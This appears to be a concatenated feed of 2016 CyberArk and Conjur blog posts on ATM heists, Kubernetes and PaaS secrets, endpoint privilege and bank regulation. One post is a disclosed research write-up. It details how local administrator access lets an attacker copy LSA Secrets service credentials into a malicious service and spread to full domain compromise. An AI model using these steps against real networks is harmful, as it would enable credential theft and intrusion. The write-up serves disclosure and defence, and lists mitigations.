In 2014 and 2015 there were the Carbanak attacks, which netted cyber criminals upwards of $1 billion from global financial institutions. In 2016, the Buhtrap gang collected $2.6 million from bank-owned ATMs in Taiwan in just two days and that resulted in over $300 million in losses. The next crime ring may be different, but the tactics and goals of the attack will likely be similar. By understanding tactics used in previous attacks, financial institutions can take proactive steps to break the attack chain.

As reported, attackers linked to the Buhtrap gang gained access to banks throughout Taiwan and Thailand by using phishing emails that appeared to be from ATM vendors and other banks. When the bank employees opened these emails – and their attachments – the attackers got in.

In the case of First Commercial Bank of Taiwan, the attackers first broke in by compromising a user in the London office via phishing, and then they used exploited insider access to move freely through the network until they gained the level of privileged access needed to issue a malicious software update to the bank’s ATMs. That planted malware later enabled attackers to dispense $2.6 million from infected ATMs in two days.

Based on what is currently known about these recent attacks, as well as what we know about the previous Carbanak attacks, here are five steps financial institutions can take to reduce the risk of becoming the next victim:

  1. If it’s End of Support, it’s time for an upgrade. Windows XP has been the backbone of ATMs for a decade, and it reached End of Support (EOS) in April 2014. This means there are no more security updates. Yet, a year after EOS, 75 percent of ATMs still ran Windows XP. Make the criminals work for their paycheck. A cyber attack is far more costly than an upgrade.
  1. Patch, patch, patch. Whether it’s your ATMs, financial systems, IT infrastructure or endpoints, don’t give attackers an open invitation into your network.
  1. Default-deny can be your friend. Though the malware planted on First Commercial Bank’s ATMs was issued through a software update, not all attacks are this sophisticated or coordinated. Many ATM malware attacks are executed via physical access and can often be blocked with a “default-deny” approach to application control.
  1. Lock down privileged accounts that enable administrative access. Determine who has access to your software distribution systems. Identify which employees and vendors are authorized to update and administer ATMs and financial systems. These users – and their accounts – are prime targets for highly motivated cyber criminals.
  1. Block and contain the attack as early as possible. There are a range of security controls that can help you to proactively prevent cyber criminals from gaining access to financial systems, ATMs, software distribution systems and other critical systems. Control applications on endpoints, remove local admin rights from standard users, and lock down privileged accounts throughout your environment. These three steps can help you limit an attacker’s ability to establish a foothold inside your network and prevent lateral movement if they’re able to get inside.
]]>
Conjur Selected for Springboard; Joins Expert Network of Women-Led Enterprise Technology & Healthcare Companies https://www.cyberark.com/blog/conjur-selected-for-springboard-joins-expert-network-of-women-led-enterprise-technology-healthcare-companies/ Tue, 29 Nov 2016 16:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-selected-for-springboard-joins-expert-network-of-women-led-enterprise-technology-healthcare-companies/  

Press Release:

Today, Conjur, a trust management platform for the cloud, announced that it has been selected to join the Springboard Expert Network, a group of influencers, investors and innovators dedicated to building high growth companies led by women. Conjur is one of only 15 women-led enterprise technology and digital healthcare companies invited to join.

“We’re in the midst of one of the most important technology shifts in the history of business as organizations move to the cloud. At the same time, the IT industry is starting to release another source of untapped potential as it becomes more inclusive of women in leadership roles,” said Elizabeth Lawler, CEO and co-founder of Conjur. “On behalf of our company, I gratefully accept Springboard’s invitation, which I am confident will help us accelerate our mission to help organizations balance innovation with security as they adopt cloud services.”

Since 2000, Springboard has become a human capital powerhouse connecting early-stage healthcare and technology-oriented companies with investors, advisors and lucrative business opportunities. Conjur joins the ranks of globally recognized brands such as Zipcar, Constant Contact, iRobot, Blurb and MinuteClinic, all of which are or were led or founded by women and are part of the Springboard portfolio.

“Investors say they like to bet on the jockey not the horse,” said Kay Koplovitz, co-founder of Springboard Enterprises and managing director of Springboard Growth Capital. “This year we are betting our human capital on an impressive group of experienced entrepreneurial women who will not only benefit from the talent in our expert network, but also add immeasurably to it.”

About Conjur
Conjur delivers a trust management software platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur automates machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Companies adopting dynamic, cloud-centric IT infrastructure across industries, including financial services, communications, media and software development, consider Conjur an essential component of their security strategy.Conjur is headquartered in Waltham, Mass., and is backed by Amplify Ventures, Avalon Partners and Koa Labs. For more information, please visit www.conjur.net or follow @conjurinc on Twitter.

About Springboard Enterprises
Springboard accelerates the growth of entrepreneurial companies led by women through access to essential resources and a global community of experts. It is the leading network of influencers, investors and innovators dedicated to building high growth companies led by women. Since 2000, 642 Springboard portfolio companies seeking investment of financial and human capital for product development and expansion have raised $7.4 billion, created tens of thousands of new jobs, and generate billions of dollars in annual revenues. Over 80% of Springboard companies are growing as independent or merged entities, including 13 IPOs, more than 160 M&A, and many that are the technology engines of publicly traded companies. Springboard invites a select group of women-led healthcare and technology companies annually into the network to support these talented women innovators and to send a message that business success and investor returns all benefit from diversity in their companies and boardrooms.

Media Contact:

Lesley Sullivan

LaunchSquad

617-945-1915

conjur@launchsquad.com

All trademarks recognized.

 

]]>
Security Holes Persist in Kubernetes: KubeCon 2016 Recap https://www.cyberark.com/blog/security-holes-persist-in-kubernetes-kubecon-2016-recap/ Mon, 28 Nov 2016 09:51:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-holes-persist-in-kubernetes-kubecon-2016-recap/  

Earlier this month I had the privilege of attending KubeCon, a two-day conference all about the latest and greatest developments in the Kubernetes ecosystem. Held in downtown Seattle, the event sold out with 1,000 attendees. Next year, KubeCon will come to Austin TX, in an even bigger venue.

Excitement was high. Kubernetes 1.4 had shipped shortly before the event and much of the crowd seemed focused on either upgrading their existing clusters and/or taking advantage of new features in the release. As Conjur’s developer advocate and resident DevOps cheerleader, I was most eager to learn about how Kubernetes users addressed their various organizations’ governance and compliance requirements.

kubecon1.png

Learning Kubernetes at KubeCon is like learning to drink water from a firehose, but as I looked over my pages of notes (and recalled discussions from previous ContainerDays events) a few points about Kubernetes and the direction of its ecosystem became clear. Excitement is high, the ecosystem is exploding, but as is often the case in the early days of emerging technologies, security is a second-class citizen. The following points are my big takeaways from the conference.

1. The ecosystem is exploding with vendor and open-source tooling

The Cloud Native Computing Foundation (CNCF), the new steward of Kubernetes and of a growing list of related tooling, is working on a Cloud Native Landscape reference that maps the technologies and tools available in the “cloud native computing” space. A work in progress, this reference will surely grow over time. If you’re been following the DevOps space lately, many of these logos will be familiar.

kubecon2.png

Analysis paralysis could become a problem here; there are simply a lot of vendors and technologies in this space. Some are competing head-to-head, but several of these technologies overlap in their feature sets. Expect to spend a lot of time evaluating several technologies to find the one that fits your use case.

It is interesting to note that 19 of the 37 sponsors for KubeCon are offering a ‘wrapped’ or hosted version (PaaS) of Kubernetes. Most are targeted towards enterprise customers that require additional features not implemented by Kubernetes itself (SSO, multi-datacenter dashboards, etc). Key selling points of these PaaS versions of Kubernetes are ease of deployment and minimizing operational maintenance. However, you do run the risk of lock-in or feature drift from Kubernetes core.

Some of the new open-source tooling that people were talking about about at KubeCon:

  • Anchore – Image security scanning CLI
  • Kompose – Renders Kubernetes resource YML from a docker-compose file
  • Calico – L3 network mesh with built-in traffic authorization
  • jsonnet – JSON templating tool, useful for Kubernetes resource files
  • linkerd – Service mesh for cloud-native applications
  • Helm – Kubernetes package manager, just reached 2.0

2. Setting up a proper production cluster is still pretty difficult

kubecon3.png

Kubernetes is composed of a number of technologies that work together to provide its feature set. This modular architecture makes it easy to scale your cluster efficiently at the cost of increased operational complexity. Several projects are now available that make it easier to stand up and maintain a Kubernetes cluster. They each have their own assumptions, benefits and drawbacks.

For local Kubernetes development, minikube is simple to get up and running. This project allows you to run and manage Kubernetes on a local virtual machine. minikube is a great way to try out Kubernetes locally. Be aware, though, that all of Kubernetes’ components are running on one machine – some features of Kubernetes like load-balancing across nodes won’t be possible. CoreOS has also released tooling for running single and multi-node clusters locally with Vagrant.

Setting up a production Kubernetes cluster can be a pain, and everyone knows it.This is why we see so many wrapper/PaaS versions of Kubernetes being made available. There are many different tools and projects that make launching a highly-available cluster easier. kops, from the Kubernetes team, provides cluster CRUD operations on top of AWS. CoreOS maintains kube-aws, a similar tool. Most platforms now have tooling for running Kubernetes clusters. Launching a cluster from scratch is also an option if you’re curious about how everything fits together.

3. Kubernetes Secrets has an Achilles Heel, and it is etcd

kubecon4.png

Secrets were added to Kubernetes in v1.3. Users create secrets and specify the pods that can read them. Sensitive credentials are made available via a temporary file system running on the cluster nodes running the pods that need them. Secrets are easy to use and provide a basic level of security for credentials that shouldn’t be built into images or passed via environment variables. That said, there are a number of potentially serious risks to consider when using Kubernetes secrets.

From the Kubernetes secrets documentation:

kubecon5.png

In practice, the engineers I talked to at KubeCon were either locking down their etcd cluster to only senior operations staff or searching for a better solution for providing secrets to their Kubernetes applications. The coarse root/non-root authorization of the Kubernetes API is also a big issue for many companies. When least privilege isn’t enforced you end up with an unreliable system.

Conjur is currently planning support for making secrets available to Kubernetes. Robust role-based access control and immutable audit are standard features for any secrets management solution.

4. Governance and security are still in the back seat

kubecon6.png

There are a number of security problems the community will need to address before Kubernetes can become a viable strategy for many organizations. Secrets insecurely stored in etcd, underdeveloped authentication/authorization for interacting with the API, escalation issues on the nodes, lack of an immutable audit log; any one of these can be a deal-breaker for organizations that want to allow more than a handful of engineers to use Kubernetes.

There are a few interesting projects attempting to tackle these issues. Calico allows you to declaratively define which pods can talk to each other at the network level. dex is an OpenID Connect provider that plugs into Kubernetes to provide authentication from a number of pluggable sources. Securing Kubernetes will be a hot topic in 2017. Look for lots of activity in this area from Conjur and others.

Closing

KubeCon was a fantastic experience. I came to the event to hear stories from people about running Kubernetes in production; how they set it up, what challenges they face, and where they’re going from here. The development workflow and resource utilization Kubernetes enables are compelling reasons for many companies to rethink how they will deliver software in the coming years.

Governance and security are still ‘in the wild west’, as I heard a few times at the conference, but work is being done to hold Kubernetes to the same standard we require for other parts of our infrastructure. If secrets management, authentication, and authorization of your Kubernetes deployments is an issue you’re thinking about, I’d love to hear from you at dustin.collins@conjur.net. Conjur is building out our support for Kubernetes, and we welcome design partners.

 

]]>
Fundamental Endpoint Security Best Practice: Securing Privilege on the Endpoint https://www.cyberark.com/blog/fundamental-endpoint-security-best-practice-securing-privilege-endpoint/ Wed, 23 Nov 2016 14:13:55 +0000 https://www.cyberark.com/blog//

Information security professionals know there are two fundamental endpoint security practices that should be part of their security program in order to reduce the attack surface. Validated by various government information security organizations and industry analysts, the first practice is application patching, and it has been widely adopted thanks to commonly available enabling tools. The second is securing privilege on the endpoint.

As part of the research conducted for the “CyberArk Global Advanced Threat Landscape Survey 2016,” 750 IT decision makers were asked if their organization’s users have local administrative privileges on their endpoint devices. Sixty-two percent said yes.

Removing local admin rights from workstations is perceived to be a difficult trade-off between security and usability. This is because the end-user often has to contact the desktop support team for the most trivial of tasks, resulting in lost productivity.

This also increases the burden of work for the support team, which can lead to missed service level agreements and increased support costs. The overall result can be a stand-off between the information security and desktop support teams.

Plugging endpoint security gaps

To compensate, organizations have added layers of preventative endpoint security, including anti-virus, personal firewalls, intrusion prevention, application and device control.

Even with these in place, many view a network breach as inevitable. In response, data loss prevention (DLP) has been deployed to detect and block attempts to exfiltrate sensitive information. In many instances, file and full disk encryption has also been added to ensure that any information stolen is useless – unless the attacker also steals encryption keys.

Today the perceived choice is either to bet on yet more prevention controls or follow the continued acceptance that a breach is inevitable, and therefore, opt to add detection and response capabilities. These complement prevention controls by helping organizations to understand when and where malicious activity might occur on their network; unfortunately, they often offer too little too late, especially with the current ransomware trend.

Enforcing least privilege

What if information security professionals could go back to that fundamental best practice that is missing? If they can overcome the objections to deploying technologies that allow them to do what they know is right, their endpoints could be far more secure. There are better options today. For example, combining least privilege management with application control allows revocation of local administrator rights, but also offers elevation of privilege for trusted applications when needed.

Facilitating application control

Application control can provide significant additional benefits, such as enabling a policy-based approach to allow known good applications to execute while blocking malicious software. There are two common objections to this approach, which CyberArk has addressed – manual policy creation and the binary approach of white and black listing.

By trusting sources of files, such as those from software distribution tools or file shares, and those with trusted signatures, CyberArk has found that 99% of applications can be automatically added to the policy. The final 1% do not have to be treated in a binary manner. This is the practice that creates a user productivity issue and generates a help desk call when the user tries to install a new application. You can run unknown applications in a restricted mode but prevent access to sensitive information, network shares and the Internet. If the application is malicious, the threat is contained on the endpoint.

Containing attacks on the endpoint

Least privilege combined with application control is a security best practice to contain attacks on the endpoint. As part of a program to secure privileges on the endpoint, consider protecting Windows credentials and those stored by popular browsers too. If you can detect and block credential theft attempts, you will stand a far better chance of containing an attack on the endpoint.

Learn more about how CyberArk can help organizations to enforce privilege security on the endpoint without the negative impact of removing local administrator rights. Visit: https://www.cyberark.com/endpoint-privilege-manager/.

]]>
Introducing CyberArk Endpoint Privilege Manager https://www.cyberark.com/blog/introducing-cyberark-endpoint-privilege-manager/ Fri, 18 Nov 2016 15:03:15 +0000 https://www.cyberark.com/blog//

Information security professionals recognize that cyber attackers will exploit endpoint vulnerabilities and then make a beeline for privileged credentials. As a result, organizations are evaluating how they can take steps to secure privilege on the endpoint as a fundamental part of their security program.

CyberArk Viewfinity has enabled organizations to reduce both the attack surface and the risk of information stolen or encrypted and held for ransom—all while achieving the right balance between productivity and security. To keep pace with the ever-evolving threat landscape, we unveiled new threat protection features this week: CyberArk Viewfinity is now available as CyberArk Endpoint Privilege Manager.

By interlocking three core capabilities: privilege management, application control and new  credential theft detection and blocking, CyberArk Endpoint Privilege Manager represents a combination of powerful technology, deep research and best practices to stop attackers from advancing beyond the endpoint and doing damage. Key enhancements include:

  • New behavioral analytics to block and contain advanced threats targeting credential theft at the endpoint.
  • The ability to detect and block credential theft attempts by malicious users and applications, including Windows credentials, remote access application credentials and those credentials stored by popular web browsers for use with, for example, corporate network and cloud applications.
  • The ability to block hash harvesting at the endpoint to prevent Pass-the-Hash, an attack leveraging stolen credentials.

The introduction of CyberArk Endpoint Privilege Manager comes on the heels of an FBI flash alert that recommends prioritizing credential protection, including implementing least privilege and restricting local accounts, to limit a threat actor’s ability to gain highly privileged account access and move throughout a network.

CyberArk Endpoint Privilege Manager is available now. For additional resources on detecting and containing cyber attacks while effectively balancing security and productivity, visit https://www.cyberark.com/products/privileged-account-security-solution/endpoint-privilege-manager/.

 

 

]]>
CyberArk Labs Research: Stealing Service Credentials to Achieve Full Domain Compromise https://www.cyberark.com/blog/cyberark-labs-research-stealing-service-credentials-achieve-full-domain-compromise/ Wed, 16 Nov 2016 16:59:07 +0000 https://www.cyberark.com/blog//

Executive Summary

The CyberArk Labs team has discovered a way to harvest encrypted service credentials from the Local Security Authority (LSA) Secrets registry hive and inject them into a new malicious service to achieve lateral movement and full domain compromise. This exploit requires that an attacker first gain local administrator privileges on an infected machine, but once those local administrator privileges are gained, the attacker can leverage a single domain-joined workstation to laterally move throughout the domain and ultimately gain access to a domain controller. This exploit can be carried out on Windows endpoints, including on the most up-to-date Windows 10 workstations that have Credential Guard (VSM) enabled.

This blog will explain how service credentials are protected today, how they can be compromised, and how the CyberArk Labs team proved that this exploit can enable lateral movement and domain compromise.

Background: How are service credentials protected today?

Beginning in Windows 7, Microsoft began protecting service credentials by securely storing them in the LSA Secrets registry hive (HKEY_LOCAL_MACHINE/Security/Policy), which is part of the Security registry hive. Here, the credentials are encrypted with the System Key using the Data Protection API (DPAPI). By default, access to the Security registry hive – and thus the Secrets within it – is restricted to the SYSTEM account only, meaning not even the Administrator can access them. However, despite this default setting, the Administrator maintains the permissions necessary to not only remove this restriction but also open a new session as the SYSTEM user and effectively operate with SYSTEM privileges. By taking advantage of these permissions, an Administrator can gain access to the LSA Secrets, dump the credentials from the registry hive and extract them using the DPAPI.

In Windows 10, Microsoft introduced Credential Guard, which was designed to mitigate the risk of lateral movement using compromised credentials (and credential hashes) by proactively securing domain user credentials in memory in an isolated, highly secure location. However, because Credential Guard only secures credentials in memory, it cannot protect service credentials that are required to properly boot the system. As a result, these service credentials, which may have domain access, remain in the LSA Secrets registry hive.

Newly Discovered Risk

The CyberArk Labs team recently discovered that service credentials stored in the LSA Secrets registry hive can be compromised in encrypted form and used to achieve lateral movement, even when Credential Guard in Windows 10 is enabled. Similar in concept to Pass-the-Hash exploits in previous versions of Windows, an attacker can use compromised encrypted secrets to laterally move through the domain without ever needing to know the underlying credential.

The Proof of Concept

Because this specific risk involves the compromise of service credentials, we hypothesized that these service credentials – which are used for legitimate services – could potentially be captured and injected into a malicious service, thus granting an attacker access to all systems and resources to which the original service had access. If this proved true, then any malicious user with local Administrator access on a Windows machine could reuse stored domain-level service credentials to laterally move through the network and potentially gain access to a domain controller.

To test this hypothesis, we started with the following baseline environment:

  • Local Administrator access on a Windows 10 laptop
  • Credential Guard enabled on the Windows 10 laptop
  • One service with non-administrative domain credentials

To test against this scenario, we created a new, blank service into which we would attempt to inject captured service credentials.  This blank service was designed to imitate a malicious service that an attacker could create and use in the wild.

Step 1: Gaining Access to LSA Secrets

The first step in gaining access to LSA Secrets is to grant the local administrator access to the Security registry hive. As mentioned above, by default, this access is reserved for the SYSTEM user only. However, the local Administrator has the permissions needed to change this default setting.

Figure 1: Security registry hive default Administrator permissions

Using local Administrator permissions, an attacker can edit the Security permissions to grant the Administrator access to the Security registry hive (HKEY_LOCAL_MACHINE/Security). Once the attacker (the “Administrator”) has read and write permissions to the Security registry hive, he or she is able to access the registry and begin searching for service secrets.

Step 2: Searching for Service Secrets

With access to LSA Secrets, we next queried the machine to search for services with domain-level access. Note, these services did not have administrative permissions; they simply had non-administrative access to other systems on the same domain.

Figure 2: Service enumeration

This query identified two services that had domain-level access: AppVClient and tzautoupdate. These services are both standard on all Windows 10 machines, and we were able to locate their secrets in the registry under:

  • HKEY_LOCAL_MACHINE/Security/Policy/Secrets/SC AppVClient
  • HKEY_LOCAL_MACHINE/Security/Policy/Secrets/SC tzautoupdate

We exported these secrets from the LSA Secrets registry hive in encrypted form and did not attempt to decrypt them with the DPAPI.  At this point, the secrets were still configured to enable authentication for these specific services only. Before we could change the configurations to execute the test using our new service, we also needed access to services’ properties.

Again, using our local Administrator access, we went to the registry and exported the properties associated with these services from: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services.

Step 3: Modifying the Secrets and Properties for Reuse

As mentioned above, the legitimate services’ secrets and properties were both configured to work for their specific services only – meaning we could not reuse them as is. However, we hypothesized that we could potentially modify the configurations of the secrets and properties to enable them to work with a different service. To test this, we used the blank service mentioned above.

Using the exported versions of the services’ secrets and properties, we modified the configurations so that both would point back to our new, blank service.

Figure 3: Service modifications

We then imported the modified secrets into the blank service’s secrets and the modified properties into the blank service’s properties, as show in Figures 4 and 5.

Figure 4: Import modified service secrets into blank service secrets

Figure 5: Import modified service properties into blank service properties

Next, we started the blank service on the machine and put it to the test.

We performed domain controller enumeration to quickly locate domain controllers, and we searched for services that had high privileged access to all enumerated domain controllers.  We also looked for all systems connected to the original victim system.  If the victim machine did not contain any services with domain controller access, we wanted to be able to laterally move to other machines, which may contain services with higher privileges.

Step 4: Achieving Lateral Movement and Full Domain Compromise

Using the compromised service information combined with information about connected systems on the network, we tested our blank service to see if we could successfully achieve lateral movement. The results were a very clear “yes.” Using these compromised and reused service credentials, we proved that compromised service credentials could, in fact, be used to achieve lateral movement.  And, with each new machine accessed, we had the potential to find service accounts with higher and higher privileges on the domain. With each new machine compromised, we were able to repeat the process of service credential compromise, modification and reuse until we eventually located a service account that had access to the domain controller and achieved full domain compromise.

Real world implications

Testing in the CyberArk Lab clearly demonstrated that an attacker with local Administrator access on a single user’s machine can compromise service credentials and reuse them to achieve lateral movement and full domain compromise – even when Credential Guard is enabled.

In a real-world scenario, an attacker could use this same process of service credential theft, modification and reuse in a malicious service, and the attacker could configure the malicious service to automate each iterative step of this attack. In such a scenario, an attacker with local Administrator access on one machine could gain full ownership of the entire domain in just minutes.

Mitigations

Despite common assumptions, Microsoft Credential Guard does not protect domain-level service credentials in the same way that it protects domain-level user credentials. As such, organizations must take extra steps to secure and monitor the use of service credentials.

To reduce the risk of service credential theft – and the resulting ability for an attacker to laterally move through the network until they gain domain administrator privileges – organizations should take the following steps:

  • Remove local administrator privileges from standard users
  • Minimize the use of domain accounts in local services to only those that are required
  • When needed, create dedicated domain accounts for services
  • Remove all unnecessary privileges from service accounts
  • Monitor all permissions changes to sensitive registry values via the Windows Event Log
  • Use credential theft detection tools to detect and block the theft of LSA Secrets

Disclosure Timeline

  • October 25, 2016: Risk reported to Microsoft Security Response Center
  • October 26, 2016: Microsoft responded that they did not consider the submission a valid vulnerability as it requires an attacker to have already compromised the machine.*
  • November 16, 2016: Public disclosure

 *According to Microsoft’s “Ten Immutable Laws of Security

 

]]>
The Monetary Authority of Singapore Emphasizes Privileged Account Security in its Technology Risk Management Guidelines – Why? https://www.cyberark.com/blog/monetary-authority-singapore-emphasizes-privileged-account-security-technology-risk-management-guidelines/ Wed, 09 Nov 2016 14:25:02 +0000 https://www.cyberark.com/blog//

In June 2013, the Monetary Authority of Singapore (the M.A.S) enhanced its “Technology Risk Management” (T.R.M.) guidelines to provide banks and financial institutions a risk management framework for their IT environments. Recognizing that improper control over privileged accounts is one of the largest security risks organizations face, the T.R.M. guidelines emphasize specific requirements related to privileged account security.

Privileged Accounts are Powerful

Privileged accounts are the keys to the proverbial IT kingdom. They enable the highest level of access and operation in IT networks, and therefore pose the most significant security concern. If hijacked by an external attacker or a malicious insider, privileged accounts will allow attackers to take full control of the IT infrastructure, disable security controls, steal confidential information, commit financial fraud, disrupt operations and much more. That’s why TRM guidelines 11.1 state that financial institutions should:

  • Only grant user access to IT systems and networks on a need-to-use basis and within the period when the access is required.
  • Ensure that records of user access are uniquely identified and logged.
  • Enforce strong password controls over users’ access to applications and systems.

By employing a proper privileged account security platform that discovers, secures and rotates credentials, while granularly controlling the use of privileged accounts, organizations can limit privileged access to only those individuals who truly need access.

Privileged Accounts are Extensively Used

Privileged accounts are not just associated with IT admin accounts or super users. These accounts are configured in every device on the network—and are also used by third parties and automated processes (such as those that control backup, access databases and perform other back-end functions). That is why the guideline 5.1.4 of the TRM stipulates:

  • IT outsourcing should not result in any weakening or degradation of the financial institution’s internal controls.
  • The financial institution should require the service provider to employ a high standard of care and diligence in its security policies, procedures and controls to protect the confidentiality and security of its sensitive or confidential information, such as customer data, computer files, records, object programs and source codes.

Think about it. How many vendors and contractors does your company work with? Their access is often privileged and needs to be protected.

Privileged Accounts are Highly Coveted

By analysing the majority of cyber breaches in the past 24 months, a common thread emerges: the external attackers penetrated the perimeter security of the targeted network, then leveraged stolen credentials to escalate privileges, conduct reconnaissance and move laterally in the network—all while avoiding detection. In some cases, the attackers stayed in the network for months without detection. That’s why 9.6.1 of the TRM guideline notes that:

  • Security monitoring is an important function within the IT environment to detect malicious attacks on IT systems. To facilitate prompt detection of unauthorised or malicious activities by internal and external parties, the financial institution should establish appropriate security monitoring systems and processes.

A proactive step to mitigating this risk is to isolate, monitor and control privileged sessions to prevent the sensitive credentials from residing on less secure user endpoints. Real-time monitoring and termination of privileged sessions due to unexpected or malicious activity provides additional layers of protection.

With the evolving threat landscape and growing complexities and reliance on IT systems in the financial sector, financial institutions must implement controls to secure their IT environments to avoid costly data breaches. The MAS TRM guidelines provide a valuable, in-depth model to follow. To learn more, download our free whitepaper.

]]>
PaaS-ing Secrets: Security Considerations for Pivotal Cloud Foundry Deployments https://www.cyberark.com/blog/paas-ing-secrets-security-considerations-for-pivotal-cloud-foundry-deployments/ Mon, 07 Nov 2016 16:47:00 +0000 https://cyberarkvx2.wpengine.com/blog/paas-ing-secrets-security-considerations-for-pivotal-cloud-foundry-deployments/  

In working with our customers who use Pivotal Cloud Foundry’s Platform-as-a-Service (PCF’s PaaS), Conjur’s technical field teams have identified common security concerns for production deployments. These challenges are sufficiently serious to block important applications that handle sensitive data from going into production. The issues described below should be considered by developers and application architects early in the PCF application development process, and they are likely common to other cloud PaaS platforms too.

Introduction

Organizations that deploy on PCF’s PaaS are optimized for speed of application development.  By virtue of PCF’s low-friction deployment workflow, applications can germinate, evolve, and scale quickly, sometimes at breathtaking speed.

But two operational problems for PaaS’s exist around introducing sensitive access credentials like database passwords and cryptographic keys into the ephemeral servers that get created:

  1. How are the credentials’ environment variables populated, without delay, in a trusted, audited manner?
  2. What are the properties of each credential relating to trust, isolation, and control?

Pivotal’s Chief Security Officer offered a compelling view earlier this year on how to make enterprise security more effective by making infrastructure more dynamic.  He called for faster repaving of servers and applications (restoring them to a known good state every hour), repairing vulnerable operating systems within hours of a patch being available, and rotating data center credentials frequently — as often as every minute!  As he noted at the end of his post, PCF doesn’t offer automated credential rotation yet, and that gap is proving problematic for some customers trying to get security-sensitive applications into production.

The question of credential rotation sounds deceptively simple, but when you dig into the requirements that large, security-conscious enterprises have, it’s much more complex as the rest of this post will illustrate.

Population of Credentials

The simple separation of secrets into configuration environment variables is a good start (see Heroku-founder Adam Wiggins’ 12-factor app best practices), but that is only the beginning.  For larger organizations that have certain compliance requirements, an added goal is also the separation of responsibility.  A credential-trusted operator should be separate from a deployment-trusted operator.  Binding credentials in environment variables either crosses those concerns because the deployment-trusted operator now needs to have access to the credentials.  The naive alternate would be to have a two-operator rule for every deployment action.  Unfortunately, that would likely slow deployments and erase some of the agility benefits of a PaaS, per Factor X: Dev/Prod Parity.

A slightly better approach is Cloud Foundry’s concept of user-provided services (via cf cups and cf uups)

http://docs.cloudfoundry.org/devguide/services/user-provided.html#user-cups that can make shared credentials available outside of the lifecycle of an app instance.  In short, that provides for some separation of concerns, and allows developers to release without hinderance.  That’s a good next step.  However, there’s no audit trail, and every application in that service group has visibility to all credentials.  There’s no finer-grained policy mechanism available.

Properties of Credentials

More broadly, some questions that affect PaaS credentials include:

  • Is there a clear, declarative policy for each class of credential enforcement? Can it be audited and trusted? How are least-privilege policies implemented?
  • What is the authentication and authorization workflow for programmatically issuing new credentials?  What are the delegation and trust mechanisms around that?
  • For elastic hybrid clouds, how do you isolate public vs. private cloud credentials?  Are there different policies in different environments?
  • What are the audit control points that can keep up with the rapid nature of a PaaS? How tamper-resistant are audit logs?
  • What are the secrets rotation policies and how do they get implemented?  Can routine rotations be handled with minimal disruption?
  • Can you securely, automatically issue credentials and secrets to supporting components like a load balancer’s SSL private key with the same level of policy and audit control?
  • What is the maximum velocity at which you can issue unique credentials?  In a standing-start reboot scenario, is your credential system a bottleneck?
  • Where are root credentials stored and accessed for disaster recovery?
  • Is there a break-glass procedure for emergencies?
  • What are high availability / resiliency options in the event of partial failures?

Conjur PaaS Design Pattern

Figure A. 1. Security team authors and publishes declarative, reusable security policy. 2. Dev team authors code and pushes to PCF as normal. 3. Application is instantiated as normal. 4. Conjur Summon, included in asset, authenticates to PCF/Conjur authenticator. 5. Authenticator retrieves token from Conjur Server (or a follower) and returns it to Summon. 6. Token is submitted to Conjur Server for a particular secret, e.g. a database password, per security policy.

A Conjur implementation can provide solutions to all of these needs.  In this application design pattern, application credentials are issued from a Conjur master server or a remote follower if in a hybrid cloud. A PaaS instance authentication service ties the PaaS orchestration mechanics to the credential service.  For each requesting application instance, the authentication service compares the metadata provided by the orchestration service upon app provisioning with an incoming request for new credentials.  If all criteria are met, an ephemeral token is issued that can be submitted to the Conjur server for the needed credentials, say a database server.

The presentation of “identity”, the fetching of the token, the subsequent exchange for a valid database credential and then the injection into the running environment variables is done automatically using Summon, Conjur’s open source secrets injection tool.  Incidentally, Summon can be used to inject secrets into any application’s environment, so a standard, policy-driven, audited process can be implemented for supporting components too.

By using Conjur both to create a declarative policy and enforce that policy at run-time, the design pattern effectively governs trust uniquely to each instance.  A clustered Conjur set-up provides for resiliency and high availability with a tamper-resistant audit trail.  The Conjur cluster can be easily sized to handle extreme scaling for high-volume application or standing-start situations.  And by having a control point for credentials, rotation of credentials can be done programmatically to minimize disruptions.

If desired, different policies can be applied for different categories of instances (e.g. internal vs. external) in order to manage exposure and risk in less trusted environments.

– !policy
id: hello-world
body:
– &runtime-variables
– !variable database/url
– !variable database/username
– !variable database/password
– !layer
– !permit
role: !layer
privilege: [ read, execute ]
resource: *runtime-variables

 

Figure B. Sample Conjur policy

Closing

At Conjur, we’ve observed that for enterprises with high-value applications like banks, infrastructure providers, and governments, the rapid deployment authority of PaaS creates a new class of security challenges.  Access to account databases and sensitive functions like treasury servers is necessary for applications.  But that access must be meted out in the smallest measure, and then each access credential must be carefully isolated for risk, audit, and governance compliance.

A manual provisioning process for those access credentials won’t cut it.  Manually creating a few credentials a day doesn’t stand a chance against a team of developers that’s releasing apps and refreshing several times an hour… or worst case, in a infrastructure re-start requiring the provisioning of potentially millions of secrets per minute.

Conjur’s core architecture is designed for robustly handling these and other authentication and authorization challenges.  Not only does it automate the management of secrets at the speed and scale demanded by developers of modern applications, but it also creates a visual representation of the security architecture and provides an audit trail that enables the the business to deploy with confidence.

If you want to learn more, check out our whitepaper on  Privileged Access Management for the Cloud & Container Era or see it in action by requesting a demo here.

 

]]>
Cyber Security: Don’t Ignore Data Integrity https://www.cyberark.com/blog/cyber-security-dont-ignore-data-integrity/ Thu, 03 Nov 2016 18:10:50 +0000 https://www.cyberark.com/blog//

Cyber security is an enabler of the digital transformation of business. While Information Technology allows the rapid delivery of goods and services and the real-time understanding of customers, markets and industries, security enables companies to use technology by ensuring that data remains protected.

Confidentiality and availability are two essential elements of cyber security and data integrity is equally critical. Integrity ensures the accuracy of data used in business processes and transactions.

Assuring accuracy

It can be difficult to prevent or even detect the theft of data. Breaches can go undetected for months, and often the victim is not aware of the loss until it is discovered by a third party, such as the FBI. Detecting the corruption or alteration of data can be even more difficult. If the data remains in the appropriate format, tampering can be less evident than theft, although the value of the data can be seriously affected.

Companies must consider not only the integrity of data in databases and applications, but also of data that has been backed up for use in disaster recovery. The National Cybersecurity Center of Excellence—a partnership between industry and the National Institute of Standards and Technology (NIST)—was formed to address the most pressing cyber security challenges to business. One of these challenges is assuring the accuracy of back-up and recovery data. Key questions being addressed by NCCoE include:

  • How to tell what data was corrupted, when, how and by whom it was corrupted.
  • What was the impact of the data corruption?
  • Which backup version should be used to recover data?

Confidence and more at stake

A company that is not sure of the integrity of its data cannot be sure that critical operations are being carried out properly, that correct decisions are made, or that the appropriate goods and services are delivered to customers and received from suppliers.

